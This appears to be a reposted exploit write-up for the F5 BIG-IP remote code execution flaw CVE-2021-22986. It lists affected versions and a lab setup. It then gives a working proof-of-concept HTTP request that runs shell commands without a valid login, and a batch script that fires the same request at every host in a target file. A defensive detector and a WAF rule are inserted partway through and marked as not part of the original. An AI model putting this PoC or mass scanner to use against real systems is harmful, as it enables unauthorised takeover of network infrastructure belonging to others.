F5 BIG-IP Remote Code Execution Vulnerability

Vulnerability overview

F5 BIG-IP is an application delivery platform from the US company F5 that integrates network traffic management, application security management, load balancing and other functions.

The platform allows system commands to be executed without logging in to an account. The vulnerability is tracked as CVE-2021-22986.

Affected versions

16.0.0 <= BIG-IP <= 16.0.1

15.1.0 <= BIG-IP <= 15.1.2

14.1.0 <= BIG-IP <= 14.1.3.1

13.1.0 <= BIG-IP <= 13.1.3.5

12.1.0 <= BIG-IP <= 12.1.5.2

7.1.0 <= BIG-IQ <= 7.1.0.2

7.0.0 <= BIG-IQ <= 7.0.0.1

6.0.0 <= BIG-IQ <= 6.1.0

Reproduction

Environment download address:

https://downloads.f5.com/esd/product.jsp?sw=BIG-IP&pro=big-ip_v14.x&ver=14.1.2

Version 14.1.2.8 was downloaded here.

Open the image in VMware; the account and password are root/default. Then configure the network with the config command.

The platform's default username is admin and its password is the system root password; after entering it you are asked to change the password, which completes the deployment.

PoC:

POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.95.105
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept: */*
Connection: close
Authorization: Basic YWRtaW46
X-F5-Auth-Token:
Content-Length: 46
Content-Type: application/json

{"command": "run", "utilCmdArgs": "-c whoami"}

The Authorization value is the system username: the default value YWRtaW46 is the base64 encoding of admin: (the username admin followed by a colon and an empty password). The X-F5-Auth-Token header must be included, even though it is empty.
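As an added defender-side example (not part of the original post), the following detector flags the request shape described above: a Basic Authorization header paired with an X-F5-Auth-Token header that is present but empty, sent to an iControl REST path under /mgmt/. The sample requests, host addresses and token values are constructed for the example, in the shape a reverse proxy or WAF in front of the management interface might record.

```python
import base64
from typing import Optional

# Constructed sample requests (not from the original post).
SAMPLE_REQUESTS = [
    # Same shape as the PoC above: Basic header plus an EMPTY X-F5-Auth-Token
    "POST /mgmt/tm/util/bash HTTP/1.1\r\nHost: 192.0.2.10\r\n"
    "Authorization: Basic YWRtaW46\r\nX-F5-Auth-Token: \r\n"
    "Content-Type: application/json\r\n\r\n"
    '{"command": "run", "utilCmdArgs": "-c whoami"}',
    # Normal API call carrying a real session token
    "GET /mgmt/tm/sys/version HTTP/1.1\r\nHost: 192.0.2.10\r\n"
    "X-F5-Auth-Token: 3XAMPL3T0K3N\r\n\r\n",
    # Basic auth with no token header at all: not the bypass shape
    "GET /mgmt/tm/sys/version HTTP/1.1\r\nHost: 192.0.2.10\r\n"
    "Authorization: Basic YWRtaW46c2VjcmV0\r\n\r\n",
]

def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, lower-cased headers)."""
    lines = raw.partition("\r\n\r\n")[0].split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {n.strip().lower(): v.strip()
               for n, _, v in (l.partition(":") for l in lines[1:])}
    return method, path, headers

def basic_auth_user(headers: dict) -> Optional[tuple]:
    """Decode 'Authorization: Basic ...' into (user, password), or None."""
    auth = headers.get("authorization", "")
    if not auth.lower().startswith("basic "):
        return None
    try:
        decoded = base64.b64decode(auth[6:].strip(), validate=True).decode()
    except (ValueError, UnicodeDecodeError):
        return None
    user, _, password = decoded.partition(":")
    return user, password

def detect_cve_2021_22986(raw: str) -> Optional[str]:
    """Flag a /mgmt/ request that combines Basic auth with an empty token header."""
    method, path, headers = parse_request(raw)
    if not path.startswith("/mgmt/") or headers.get("x-f5-auth-token") != "":
        return None
    creds = basic_auth_user(headers)  # password value is irrelevant to the match
    if creds is None:
        return None
    if method == "POST" and path.startswith("/mgmt/tm/util/bash"):
        return "critical: command execution attempt via /mgmt/tm/util/bash as " + creds[0]
    return "high: empty X-F5-Auth-Token with Basic auth as %s on %s" % (creds[0], path)
```

The same check can be expressed as a WAF or proxy rule on the management interface: deny requests to /mgmt/ that carry an empty X-F5-Auth-Token header together with a Basic Authorization header, and restrict the management interface to trusted networks as F5's advisory recommends.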

Batch detection:

import requests
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning


def title():
    print('+------------------------------------------')
    print('+ 使用格式: python3 poc.py')
    print('+ File >>> ip.txt')
    print('+------------------------------------------')


def POC_1(target_url):
    # Sends the same request shape as the PoC above; a 200 response whose body
    # contains "commandResult" means the command ran without a valid token.
    vuln_url = target_url + "/mgmt/tm/util/bash"
    headers = {
        "Authorization": "Basic YWRtaW46QVNhc1M=",
        "X-F5-Auth-Token": "",
        "Content-Type": "application/json"
    }
    data = '{"command":"run","utilCmdArgs":"-c id"}'
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=2)
        if "commandResult" in response.text and response.status_code == 200:
            print("目标 {}存在漏洞,响应为:{} ".format(target_url, json.loads(response.text)["commandResult"]))
        else:
            print("目标 {}不存在漏洞".format(target_url))
    except Exception as e:
        print("目标 {} 请求失败".format(target_url))


def Scan(file_name):
    # One target per line; https:// is prepended when no scheme is given.
    with open(file_name, "r", encoding='utf8') as scan_url:
        for url in scan_url:
            url = url.strip()
            if url[:4] != "http":
                url = "https://" + url
            try:
                POC_1(url)
            except Exception as e:
                print("请求报错: {}".format(e))
                continue


if __name__ == '__main__':
    title()
    file_name = str(input("Please input Attack File\nFile >>> "))
    Scan(file_name)